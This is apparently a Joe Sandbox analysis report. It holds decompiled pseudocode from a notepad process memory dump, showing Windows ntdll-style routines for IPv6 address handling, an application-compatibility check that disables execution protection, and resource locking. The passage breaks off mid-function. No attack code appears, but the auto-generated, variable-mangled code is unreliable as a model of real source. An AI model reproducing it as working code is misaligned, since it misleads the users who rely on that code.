                                                  Similarity
                                                  • API ID: _wcspbrk
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 402402107-258546922
                                                  • Opcode ID: d70ccf11c896523ec9ed58ab43945f0a38c7865444df3c09bc0e6bea2c32c3f7
                                                  • Instruction ID: 67c14371bfe66c00eee747b181be6ec240e7c0b789b7cb5d07730c6648092c40
                                                  • Opcode Fuzzy Hash: d70ccf11c896523ec9ed58ab43945f0a38c7865444df3c09bc0e6bea2c32c3f7
                                                  • Instruction Fuzzy Hash: A4F1C6B2D00209EFCF11DF99CA81EEEB7B9FF08300F15446AE605A7251EB359A45DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E00AE13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr* _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				intOrPtr _t71;
                                                  				signed int _t78;
                                                  				signed int _t86;
                                                  				char _t90;
                                                  				signed int _t91;
                                                  				signed int _t96;
                                                  				intOrPtr _t108;
                                                  				signed int _t114;
                                                  				void* _t115;
                                                  				intOrPtr _t128;
                                                  				intOrPtr* _t129;
                                                  				void* _t130;
                                                  
                                                  				_t129 = _a4;
                                                  				_t128 = _a8;
                                                  				_t116 = 0;
                                                  				_t71 = _t128 + 0x5c;
                                                  				_v8 = 8;
                                                  				_v20 = _t71;
                                                  				if( *_t129 == 0) {
                                                  					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                  						goto L5;
                                                  					} else {
                                                  						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                  						if(_t96 != 0) {
                                                  							L38:
                                                  							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                  								goto L5;
                                                  							} else {
                                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                                  								_t86 = E00AD7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                  								L36:
                                                  								return _t128 + _t86 * 2;
                                                  							}
                                                  						}
                                                  						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                  						if(_t114 == 0) {
                                                  							L33:
                                                  							_t115 = 0xaa2926;
                                                  							L35:
                                                  							_push( *(_t129 + 0xf) & 0x000000ff);
                                                  							_push( *(_t129 + 0xe) & 0x000000ff);
                                                  							_push( *(_t129 + 0xd) & 0x000000ff);
                                                  							_push( *(_t129 + 0xc) & 0x000000ff);
                                                  							_t86 = E00AD7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                  							goto L36;
                                                  						}
                                                  						if(_t114 != 0xffff) {
                                                  							_t116 = 0;
                                                  							goto L38;
                                                  						}
                                                  						if(_t114 != 0) {
                                                  							_t115 = 0xaa9cac;
                                                  							goto L35;
                                                  						}
                                                  						goto L33;
                                                  					}
                                                  				} else {
                                                  					L5:
                                                  					_a8 = _t116;
                                                  					_a4 = _t116;
                                                  					_v12 = _t116;
                                                  					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                  						if( *(_t129 + 0xa) == 0xfe5e) {
                                                  							_v8 = 6;
                                                  						}
                                                  					}
                                                  					_t90 = _v8;
                                                  					if(_t90 <= _t116) {
                                                  						L11:
                                                  						if(_a8 - _a4 <= 1) {
                                                  							_a8 = _t116;
                                                  							_a4 = _t116;
                                                  						}
                                                  						_t91 = 0;
                                                  						if(_v8 <= _t116) {
                                                  							L22:
                                                  							if(_v8 < 8) {
                                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                                  								_t128 = _t128 + E00AD7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                  							}
                                                  							return _t128;
                                                  						} else {
                                                  							L14:
                                                  							if(_a4 > _t91 || _t91 >= _a8) {
                                                  								if(_t91 != _t116 && _t91 != _a8) {
                                                  									_push(":");
                                                  									_push(_t71 - _t128 >> 1);
                                                  									_push(_t128);
                                                  									_t128 = _t128 + E00AD7707() * 2;
                                                  									_t71 = _v20;
                                                  									_t130 = _t130 + 0xc;
                                                  								}
                                                  								_t78 = E00AD7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                  								_t130 = _t130 + 0x10;
                                                  							} else {
                                                  								_push(L"::");
                                                  								_push(_t71 - _t128 >> 1);
                                                  								_push(_t128);
                                                  								_t78 = E00AD7707();
                                                  								_t130 = _t130 + 0xc;
                                                  								_t91 = _a8 - 1;
                                                  							}
                                                  							_t91 = _t91 + 1;
                                                  							_t128 = _t128 + _t78 * 2;
                                                  							_t71 = _v20;
                                                  							if(_t91 >= _v8) {
                                                  								goto L22;
                                                  							}
                                                  							_t116 = 0;
                                                  							goto L14;
                                                  						}
                                                  					} else {
                                                  						_t108 = 1;
                                                  						_v16 = _t129;
                                                  						_v24 = _t90;
                                                  						do {
                                                  							if( *_v16 == _t116) {
                                                  								if(_t108 - _v12 > _a8 - _a4) {
                                                  									_a4 = _v12;
                                                  									_a8 = _t108;
                                                  								}
                                                  								_t116 = 0;
                                                  							} else {
                                                  								_v12 = _t108;
                                                  							}
                                                  							_v16 = _v16 + 2;
                                                  							_t108 = _t108 + 1;
                                                  							_t26 =  &_v24;
                                                  							 *_t26 = _v24 - 1;
                                                  						} while ( *_t26 != 0);
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: a8e4beb2a8a3b7b91674aa0c3aa4d9915c6ad785abc15110231a2d1997320956
                                                  • Instruction ID: 5f2c88084b4e9145beae098e0071b063de707f7d6baac25e20a889b4a2a3facd
                                                  • Opcode Fuzzy Hash: a8e4beb2a8a3b7b91674aa0c3aa4d9915c6ad785abc15110231a2d1997320956
                                                  • Instruction Fuzzy Hash: 4A613CB19046A5AACB34DF5AC8808BF7BF5EF95300754C56EF4E6476C0D334AA40CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 64%
                                                  			E00AD7EFD(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				char _v540;
                                                  				unsigned int _v544;
                                                  				signed int _v548;
                                                  				intOrPtr _v552;
                                                  				char _v556;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t33;
                                                  				void* _t38;
                                                  				unsigned int _t46;
                                                  				unsigned int _t47;
                                                  				unsigned int _t52;
                                                  				intOrPtr _t56;
                                                  				unsigned int _t62;
                                                  				void* _t69;
                                                  				void* _t70;
                                                  				intOrPtr _t72;
                                                  				signed int _t73;
                                                  				void* _t74;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  				void* _t77;
                                                  
                                                  				_t33 =  *0xb82088; // 0x7587b8fb
                                                  				_v8 = _t33 ^ _t73;
                                                  				_v548 = _v548 & 0x00000000;
                                                  				_t72 = _a4;
                                                  				if(E00AD7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                  					__eflags = _v548;
                                                  					if(_v548 == 0) {
                                                  						goto L1;
                                                  					}
                                                  					_t62 = _t72 + 0x24;
                                                  					E00AF3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                  					_t71 = 0x214;
                                                  					_v544 = 0x214;
                                                  					E00AADFC0( &_v540, 0, 0x214);
                                                  					_t75 = _t74 + 0x20;
                                                  					_t46 =  *0xb84218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                  					__eflags = _t46;
                                                  					if(_t46 == 0) {
                                                  						goto L1;
                                                  					}
                                                  					_t47 = _v544;
                                                  					__eflags = _t47;
                                                  					if(_t47 == 0) {
                                                  						goto L1;
                                                  					}
                                                  					__eflags = _t47 - 0x214;
                                                  					if(_t47 >= 0x214) {
                                                  						goto L1;
                                                  					}
                                                  					_push(_t62);
                                                  					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                  					E00AF3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                  					_t52 = E00AB0D27( &_v540, L"Execute=1");
                                                  					_t76 = _t75 + 0x1c;
                                                  					_push(_t62);
                                                  					__eflags = _t52;
                                                  					if(_t52 == 0) {
                                                  						E00AF3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                  						_t71 =  &_v540;
                                                  						_t56 = _t73 + _v544 - 0x218;
                                                  						_t77 = _t76 + 0x14;
                                                  						_v552 = _t56;
                                                  						__eflags = _t71 - _t56;
                                                  						if(_t71 >= _t56) {
                                                  							goto L1;
                                                  						} else {
                                                  							goto L10;
                                                  						}
                                                  						while(1) {
                                                  							L10:
                                                  							_t62 = E00AB8375(_t71, 0x20);
                                                  							_pop(_t69);
                                                  							__eflags = _t62;
                                                  							if(__eflags != 0) {
                                                  								__eflags = 0;
                                                  								 *_t62 = 0;
                                                  							}
                                                  							E00AF3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                  							_t77 = _t77 + 0x10;
                                                  							E00B1E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                  							__eflags = _t62;
                                                  							if(_t62 == 0) {
                                                  								goto L1;
                                                  							}
                                                  							_t31 = _t62 + 2; // 0x2
                                                  							_t71 = _t31;
                                                  							__eflags = _t71 - _v552;
                                                  							if(_t71 >= _v552) {
                                                  								goto L1;
                                                  							}
                                                  						}
                                                  					}
                                                  					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                  					_push(3);
                                                  					_push(0x55);
                                                  					E00AF3F92();
                                                  					_t38 = 1;
                                                  					L2:
                                                  					return E00AAE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                  				}
                                                  				L1:
                                                  				_t38 = 0;
                                                  				goto L2;
                                                  			}

                                                  APIs
                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AF3F12
                                                  Strings
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AF3EC4
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AFE2FB
                                                  • Execute=1, xrefs: 00AF3F5E
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00AFE345
                                                  • ExecuteOptions, xrefs: 00AF3F04
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AF3F75
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AF3F4A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: BaseDataModuleQuery
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 3901378454-484625025
                                                  • Opcode ID: ca624eb08c2beab274f8b8ee01f8041a121cabc4dd81f4ccb76863923bab1d64
                                                  • Instruction ID: 47349778f11d4d1eba107799e02a7147ab8455b61e03e7f0fb318e34521b8930
                                                  • Opcode Fuzzy Hash: ca624eb08c2beab274f8b8ee01f8041a121cabc4dd81f4ccb76863923bab1d64
                                                  • Instruction Fuzzy Hash: 93416472A4021C7ADF259B94DC86FEE73BCAB59700F0005A9F606E7191EB709A45CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00AE0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				void* _t108;
                                                  				void* _t116;
                                                  				char _t120;
                                                  				short _t121;
                                                  				void* _t128;
                                                  				intOrPtr* _t130;
                                                  				char _t132;
                                                  				short _t133;
                                                  				intOrPtr _t141;
                                                  				signed int _t156;
                                                  				signed int _t174;
                                                  				intOrPtr _t177;
                                                  				intOrPtr* _t179;
                                                  				intOrPtr _t180;
                                                  				void* _t183;
                                                  
                                                  				_t179 = _a4;
                                                  				_t141 =  *_t179;
                                                  				_v16 = 0;
                                                  				_v28 = 0;
                                                  				_v8 = 0;
                                                  				_v24 = 0;
                                                  				_v12 = 0;
                                                  				_v32 = 0;
                                                  				_v20 = 0;
                                                  				if(_t141 == 0) {
                                                  					L41:
                                                  					 *_a8 = _t179;
                                                  					_t180 = _v24;
                                                  					if(_t180 != 0) {
                                                  						if(_t180 != 3) {
                                                  							goto L6;
                                                  						}
                                                  						_v8 = _v8 + 1;
                                                  					}
                                                  					_t174 = _v32;
                                                  					if(_t174 == 0) {
                                                  						if(_v8 == 7) {
                                                  							goto L43;
                                                  						}
                                                  						goto L6;
                                                  					}
                                                  					L43:
                                                  					if(_v16 != 1) {
                                                  						if(_v16 != 2) {
                                                  							goto L6;
                                                  						}
                                                  						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                  						L47:
                                                  						if(_t174 != 0) {
                                                  							E00AB8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                  							_t116 = 8;
                                                  							E00AADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                  						}
                                                  						return 0;
                                                  					}
                                                  					if(_t180 != 0) {
                                                  						if(_v12 > 3) {
                                                  							goto L6;
                                                  						}
                                                  						_t120 = E00AE0CFA(_v28, 0, 0xa);
                                                  						_t183 = _t183 + 0xc;
                                                  						if(_t120 > 0xff) {
                                                  							goto L6;
                                                  						}
                                                  						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                  						goto L47;
                                                  					}
                                                  					if(_v12 > 4) {
                                                  						goto L6;
                                                  					}
                                                  					_t121 = E00AE0CFA(_v28, _t180, 0x10);
                                                  					_t183 = _t183 + 0xc;
                                                  					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                  					goto L47;
                                                  				} else {
                                                  					while(1) {
                                                  						_t123 = _v16;
                                                  						if(_t123 == 0) {
                                                  							goto L7;
                                                  						}
                                                  						_t108 = _t123 - 1;
                                                  						if(_t108 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						_t178 = _t141;
                                                  						if(E00AE06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                  							if(E00AE06BA(_t135, _t178) == 0 || E00AE0A5B(_t136, _t178) == 0) {
                                                  								if(_t141 != 0x3a) {
                                                  									if(_t141 == 0x2e) {
                                                  										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                  											goto L41;
                                                  										} else {
                                                  											_v24 = _v24 + 1;
                                                  											L27:
                                                  											_v16 = _v16 & 0x00000000;
                                                  											L28:
                                                  											if(_v28 == 0) {
                                                  												goto L20;
                                                  											}
                                                  											_t177 = _v24;
                                                  											if(_t177 != 0) {
                                                  												if(_v12 > 3) {
                                                  													L6:
                                                  													return 0xc000000d;
                                                  												}
                                                  												_t132 = E00AE0CFA(_v28, 0, 0xa);
                                                  												_t183 = _t183 + 0xc;
                                                  												if(_t132 > 0xff) {
                                                  													goto L6;
                                                  												}
                                                  												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                  												goto L20;
                                                  											}
                                                  											if(_v12 > 4) {
                                                  												goto L6;
                                                  											}
                                                  											_t133 = E00AE0CFA(_v28, 0, 0x10);
                                                  											_t183 = _t183 + 0xc;
                                                  											_v20 = _v20 + 1;
                                                  											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                  											goto L20;
                                                  										}
                                                  									}
                                                  									goto L41;
                                                  								}
                                                  								if(_v24 > 0 || _v8 > 6) {
                                                  									goto L41;
                                                  								} else {
                                                  									_t130 = _t179 + 1;
                                                  									if( *_t130 == _t141) {
                                                  										if(_v32 != 0) {
                                                  											goto L41;
                                                  										}
                                                  										_v32 = _v8 + 1;
                                                  										_t156 = 2;
                                                  										_v8 = _v8 + _t156;
                                                  										L34:
                                                  										_t179 = _t130;
                                                  										_v16 = _t156;
                                                  										goto L28;
                                                  									}
                                                  									_v8 = _v8 + 1;
                                                  									goto L27;
                                                  								}
                                                  							} else {
                                                  								_v12 = _v12 + 1;
                                                  								if(_v24 > 0) {
                                                  									goto L41;
                                                  								}
                                                  								_a7 = 1;
                                                  								goto L20;
                                                  							}
                                                  						} else {
                                                  							_v12 = _v12 + 1;
                                                  							L20:
                                                  							_t179 = _t179 + 1;
                                                  							_t141 =  *_t179;
                                                  							if(_t141 == 0) {
                                                  								goto L41;
                                                  							}
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						if(_t141 == 0x3a) {
                                                  							if(_v24 > 0 || _v8 > 0) {
                                                  								goto L41;
                                                  							} else {
                                                  								_t130 = _t179 + 1;
                                                  								if( *_t130 != _t141) {
                                                  									goto L41;
                                                  								}
                                                  								_v20 = _v20 + 1;
                                                  								_t156 = 2;
                                                  								_v32 = 1;
                                                  								_v8 = _t156;
                                                  								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                  								goto L34;
                                                  							}
                                                  						}
                                                  						L8:
                                                  						if(_v8 > 7) {
                                                  							goto L41;
                                                  						}
                                                  						_t142 = _t141;
                                                  						if(E00AE06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                  							if(E00AE06BA(_t124, _t142) == 0 || E00AE0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                  								goto L41;
                                                  							} else {
                                                  								_t128 = 1;
                                                  								_a7 = 1;
                                                  								_v28 = _t179;
                                                  								_v16 = 1;
                                                  								_v12 = 1;
                                                  								L39:
                                                  								if(_v16 == _t128) {
                                                  									goto L20;
                                                  								}
                                                  								goto L28;
                                                  							}
                                                  						} else {
                                                  							_a7 = 0;
                                                  							_v28 = _t179;
                                                  							_v16 = 1;
                                                  							_v12 = 1;
                                                  							goto L20;
                                                  						}
                                                  					}
                                                  				}
                                                  				L1:
                                                  				_t123 = _t108 == 1;
                                                  				if(_t108 == 1) {
                                                  					goto L8;
                                                  				}
                                                  				_t128 = 1;
                                                  				goto L39;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID: .$:$:
                                                  • API String ID: 3965848254-2308638275
                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction ID: bb91dc64d0d918df621b2e8cd92747829d119911a66881977b280a4c0df3a477
                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction Fuzzy Hash: D8A18D71A0038ADFCB24CF66C845ABEB7B4BF45704F34856AD852A7282D7B49AC1CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E00AE0554(signed int _a4, char _a8) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int* _t49;
                                                  				signed int _t51;
                                                  				signed int _t56;
                                                  				signed int _t58;
                                                  				signed int _t61;
                                                  				signed int _t63;
                                                  				void* _t66;
                                                  				intOrPtr _t67;
                                                  				void* _t69;
                                                  				signed int _t70;
                                                  				void* _t75;
                                                  				signed int _t81;
                                                  				signed int _t84;
                                                  				void* _t86;
                                                  				signed int _t93;
                                                  				signed int _t96;
                                                  				intOrPtr _t105;
                                                  				signed int _t107;
                                                  				void* _t110;
                                                  				signed int _t115;
                                                  				signed int* _t119;
                                                  				void* _t125;
                                                  				void* _t126;
                                                  				signed int _t128;
                                                  				signed int _t130;
                                                  				signed int _t138;
                                                  				signed int _t144;
                                                  				void* _t158;
                                                  				void* _t159;
                                                  				void* _t160;
                                                  
                                                  				_t96 = _a4;
                                                  				_t115 =  *(_t96 + 0x28);
                                                  				_push(_t138);
                                                  				if(_t115 < 0) {
                                                  					_t105 =  *[fs:0x18];
                                                  					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                  					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                  						goto L6;
                                                  					} else {
                                                  						__eflags = _t115 | 0xffffffff;
                                                  						asm("lock xadd [eax], edx");
                                                  						return 1;
                                                  					}
                                                  				} else {
                                                  					L6:
                                                  					_push(_t128);
                                                  					while(1) {
                                                  						L7:
                                                  						__eflags = _t115;
                                                  						if(_t115 >= 0) {
                                                  							break;
                                                  						}
                                                  						__eflags = _a8;
                                                  						if(_a8 == 0) {
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						} else {
                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                  							_t49 = _t96 + 0x1c;
                                                  							_t106 = 1;
                                                  							asm("lock xadd [edx], ecx");
                                                  							_t115 =  *(_t96 + 0x28);
                                                  							__eflags = _t115;
                                                  							if(_t115 < 0) {
                                                  								L23:
                                                  								_t130 = 0;
                                                  								__eflags = 0;
                                                  								while(1) {
                                                  									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                  									asm("sbb esi, esi");
                                                  									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b801c0;
                                                  									_push(_t144);
                                                  									_push(0);
                                                  									_t51 = E00A9F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                  									__eflags = _t51 - 0x102;
                                                  									if(_t51 != 0x102) {
                                                  										break;
                                                  									}
                                                  									_t106 =  *(_t144 + 4);
                                                  									_t126 =  *_t144;
                                                  									_t86 = E00AE4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                  									_push(_t126);
                                                  									_push(_t86);
                                                  									E00AF3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                  									E00AF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                  									_t130 = _t130 + 1;
                                                  									_t160 = _t158 + 0x28;
                                                  									__eflags = _t130 - 2;
                                                  									if(__eflags > 0) {
                                                  										E00B2217A(_t106, __eflags, _t96);
                                                  									}
                                                  									_push("RTL: Re-Waiting\n");
                                                  									_push(0);
                                                  									_push(0x65);
                                                  									E00AF3F92();
                                                  									_t158 = _t160 + 0xc;
                                                  								}
                                                  								__eflags = _t51;
                                                  								if(__eflags < 0) {
                                                  									_push(_t51);
                                                  									E00AE3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                  									asm("int3");
                                                  									while(1) {
                                                  										L32:
                                                  										__eflags = _a8;
                                                  										if(_a8 == 0) {
                                                  											break;
                                                  										}
                                                  										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                  										_t119 = _t96 + 0x24;
                                                  										_t107 = 1;
                                                  										asm("lock xadd [eax], ecx");
                                                  										_t56 =  *(_t96 + 0x28);
                                                  										_a4 = _t56;
                                                  										__eflags = _t56;
                                                  										if(_t56 != 0) {
                                                  											L40:
                                                  											_t128 = 0;
                                                  											__eflags = 0;
                                                  											while(1) {
                                                  												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                  												asm("sbb esi, esi");
                                                  												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b801c0;
                                                  												_push(_t138);
                                                  												_push(0);
                                                  												_t58 = E00A9F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                  												__eflags = _t58 - 0x102;
                                                  												if(_t58 != 0x102) {
                                                  													break;
                                                  												}
                                                  												_t107 =  *(_t138 + 4);
                                                  												_t125 =  *_t138;
                                                  												_t75 = E00AE4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                  												_push(_t125);
                                                  												_push(_t75);
                                                  												E00AF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                  												E00AF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                  												_t128 = _t128 + 1;
                                                  												_t159 = _t158 + 0x28;
                                                  												__eflags = _t128 - 2;
                                                  												if(__eflags > 0) {
                                                  													E00B2217A(_t107, __eflags, _t96);
                                                  												}
                                                  												_push("RTL: Re-Waiting\n");
                                                  												_push(0);
                                                  												_push(0x65);
                                                  												E00AF3F92();
                                                  												_t158 = _t159 + 0xc;
                                                  											}
                                                  											__eflags = _t58;
                                                  											if(__eflags < 0) {
                                                  												_push(_t58);
                                                  												E00AE3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                  												asm("int3");
                                                  												_t61 =  *_t107;
                                                  												 *_t107 = 0;
                                                  												__eflags = _t61;
                                                  												if(_t61 == 0) {
                                                  													L1:
                                                  													_t63 = E00AC5384(_t138 + 0x24);
                                                  													if(_t63 != 0) {
                                                  														goto L52;
                                                  													} else {
                                                  														goto L2;
                                                  													}
                                                  												} else {
                                                  													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                  													_push( &_a4);
                                                  													_push(_t61);
                                                  													_t70 = E00A9F970( *((intOrPtr*)(_t138 + 0x18)));
                                                  													__eflags = _t70;
                                                  													if(__eflags >= 0) {
                                                  														goto L1;
                                                  													} else {
                                                  														_push(_t70);
                                                  														E00AE3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                  														L52:
                                                  														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                  														_push( &_a4);
                                                  														_push(1);
                                                  														_t63 = E00A9F970( *((intOrPtr*)(_t138 + 0x20)));
                                                  														__eflags = _t63;
                                                  														if(__eflags >= 0) {
                                                  															L2:
                                                  															return _t63;
                                                  														} else {
                                                  															_push(_t63);
                                                  															E00AE3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                  															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                  															_push( &_a4);
                                                  															_push(1);
                                                  															_t63 = E00A9F970( *((intOrPtr*)(_t138 + 0x20)));
                                                  															__eflags = _t63;
                                                  															if(__eflags >= 0) {
                                                  																goto L2;
                                                  															} else {
                                                  																_push(_t63);
